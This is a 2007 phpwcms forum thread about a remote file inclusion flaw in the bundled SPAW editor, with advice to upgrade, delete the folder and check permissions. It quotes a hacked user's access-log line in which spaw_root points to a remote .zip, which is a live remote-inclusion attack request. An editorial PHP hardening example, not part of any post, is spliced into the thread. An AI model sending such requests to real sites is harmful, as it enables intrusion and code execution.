Get help with installation and running phpwcms here. Please do not post bug reports or feature requests here.
Peekay
Posts: 286 Joined: Sun 25. Jul 2004, 23:24
Location: UK
Post by Peekay » Tue 19. Jun 2007, 01:13
Apparently, Spaw version 1.0 has a vulnerability, specifically involving 'spaw_control.class.php'. According to Secunia, the issue is resolved by upgrading Spaw to version > 1.0.4.
http://secunia.com/advisories/10451/
and Solmetra (the makers of Spaw) recommend upgrading to at least 1.2.4, the current version being 2.0.4.1.
DeXXus
Posts: 2168 Joined: Fri 28. Nov 2003, 06:20
Location: USA - Florida
Post by DeXXus » Tue 19. Jun 2007, 02:43
"/include/inc_ext/spaw2/spaw.inc.php"
SPAW Editor v.2
Peekay
Posts: 286 Joined: Sun 25. Jul 2004, 23:24
Location: UK
Post by Peekay » Tue 19. Jun 2007, 10:46
This is relevant to those still using PHPWCMS 1.28 or earlier, which included Spaw 1.0.
DeXXus
Posts: 2168 Joined: Fri 28. Nov 2003, 06:20
Location: USA - Florida
Post by DeXXus » Tue 19. Jun 2007, 13:17
You're right, of course!
It would ~seem~ that, unless they are sharp, it would be tough for most folks to implement the new version AND add the "phpWCMS-specific" customization.
sebby
Posts: 28 Joined: Thu 28. Apr 2005, 00:31
Post by sebby » Sun 24. Jun 2007, 16:58
Hello,
This thread should most definitely be moved to the Security alert forum as many others out there (that are also using spaw as a third party product) have already been hit through that vulnerability.
Regards,
1996 328ti
Posts: 317 Joined: Mon 19. Apr 2004, 06:10
Location: Greenville, SC USA
Post by 1996 328ti » Fri 7. Sep 2007, 17:32
The last time I upgraded I lost some of my RTs, so I am still on an older version.
What is SPAW used for?
Pappnase
Post by Pappnase » Sat 8. Sep 2007, 02:35
Hello,
SPAW is only a WYSIWYG editor, so if you use the FCK editor you can delete the SPAW folder.
1996 328ti
Posts: 317 Joined: Mon 19. Apr 2004, 06:10
Location: Greenville, SC USA
Post by 1996 328ti » Sat 8. Sep 2007, 03:26
Pappnase wrote: Hello,
SPAW is only a WYSIWYG editor, so if you use the FCK editor you can delete the SPAW folder.
Thanks. I'll delete it then.
Whoever hacked into my site placed this in my spaw directory.
include/inc_ext/spaw/dialogs/table.php?spaw_root=http://----.org/coo2.zip? HTTP/1.1" 200 1203364
Pappnase
Post by Pappnase » Sat 8. Sep 2007, 07:48
Hello,
As far as I know, this could only happen if you set up the wrong rights on the folders.
DeXXus
Posts: 2168 Joined: Fri 28. Nov 2003, 06:20
Location: USA - Florida
Post by DeXXus » Sat 8. Sep 2007, 09:26
Pappnase wrote: Hello,
As far as I know, this could only happen if you set up the wrong rights on the folders.
Just an additional possible vulnerability:
The OLD vulnerability (phpWCMS v1.26) was also something to do with register_globals:
Exploit:
~~~~~
Variable $spaw_root not sanitized. When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
Solution:
~~~~~~~
declare variable $spaw_root
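To make the advisory's fix concrete, here is an added example (not SPAW's or phpwcms's own code) of the vulnerable shape beside the hardened one: with register_globals=On an unassigned $spaw_root can be filled from the request, so the fix is to assign it unconditionally and refuse any include path that leaves the install directory. The file layout and the helper name spaw_safe_include_path are assumptions.

```php
<?php
// Added example, not SPAW's or phpwcms's own code. The include path below and
// the helper name are assumed for illustration.

// BEFORE (vulnerable shape): $spaw_root is never assigned in this file. With
// register_globals=On, PHP pre-populates it from the request, so the include
// path is request-controlled (the "php injection" the advisory refers to).
//
//   include $spaw_root . 'class/spaw_control.class.php';

// AFTER, step 1: assign $spaw_root unconditionally before any use, so a value
// injected through register_globals is simply overwritten.
$spaw_root = dirname(__FILE__) . '/';

/**
 * Return the resolved include path only if it is a real file inside
 * $spaw_root. Remote URLs (http://, ftp://) and "../" traversal both fail
 * realpath() or the prefix check and are rejected.
 */
function spaw_safe_include_path($spaw_root, $relative)
{
    $base = realpath($spaw_root);
    $full = realpath($spaw_root . $relative);
    if ($base === false || $full === false) {
        return false;                       // not a local file at all
    }
    // Must be a descendant of the install root (absolute paths and "../"
    // resolve outside it and fail here).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return false;
    }
    return $full;
}

// AFTER, step 2 (defence in depth): refuse to run while register_globals is
// still on, since any other undeclared variable has the same weakness.
if (ini_get('register_globals')) {
    die('register_globals must be Off (php.ini or .htaccess: register_globals = Off).');
}

$path = spaw_safe_include_path($spaw_root, 'class/spaw_control.class.php');
if ($path === false) {
    die('Refusing to include a file outside the SPAW directory.');
}
include $path;
```

The log line quoted earlier in this thread (spaw_root pointing at a remote .zip) is exactly the input the prefix check rejects, since realpath() of a URL returns false.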
Pappnase
Post by Pappnase » Sat 8. Sep 2007, 10:21
ahhh
sorry dex
lucky to have somebody who's watching me
DeXXus
Posts: 2168 Joined: Fri 28. Nov 2003, 06:20
Location: USA - Florida
Post by DeXXus » Sat 8. Sep 2007, 11:23
Pappnase wrote: ahhh
sorry dex
lucky to have somebody who's watching me
@Pappnase
HeHe, even a "superhero" like you cannot remember everything!
-=U ROCK=-
We need to CLONE you!
Pappnase
Post by Pappnase » Sat 8. Sep 2007, 11:41
DeXXus wrote: Pappnase wrote: ahhh
sorry dex
lucky to have somebody who's watching me
@Pappnase
HeHe, even a "superhero" like you cannot remember everything!
-=U ROCK=-
We need to CLONE you!
Hey dex,
if you were a woman I would give you a kiss, but now you only get a beer.
1996 328ti
Posts: 317 Joined: Mon 19. Apr 2004, 06:10
Location: Greenville, SC USA
Post by 1996 328ti » Sun 9. Sep 2007, 21:48
Pappnase wrote: Hello,
As far as I know, this could only happen if you set up the wrong rights on the folders.
I'm going over permissions, since I installed this so long ago. What should /includes and /images be set to?